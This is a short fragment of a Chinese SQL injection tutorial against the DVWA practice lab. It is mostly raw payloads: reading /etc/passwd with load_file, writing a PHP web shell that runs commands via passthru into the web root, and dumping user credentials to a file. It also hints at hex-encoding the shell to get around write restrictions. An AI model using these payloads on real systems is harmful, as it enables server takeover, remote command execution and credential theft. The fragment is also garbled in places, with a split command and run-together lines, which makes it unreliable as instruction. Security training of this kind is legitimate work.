'union SELECT null,load_file('/etc/passwd')--+ (+代表空格)首先设置好代理之后,在浏览器访问dvwa,然后SQL中输入参数,之后到bp中发送到Repeater进行重放
'union select null,"<?php passthru($_GET['cmd']);?>"INTO DUMPFILE "/var/www/a.php" --+ (+代表空格)#往目录中写一句话木马执行之后发现有报错,没有办法写入。稍微想一下肯定知道这个是因为我们注入的用户没有办法写权限。
这时候我们可以结合之前学习的文件上传漏洞来搞定他!
cat a.php | xxd -ps | tr -d '
'#之后就可以编码成功'union select null,concat(user,0x3a,password) from users INTO OUTFILE '/tmp/a.db'--+(+代表空格)| 留言与评论(共有 0 条评论) “” |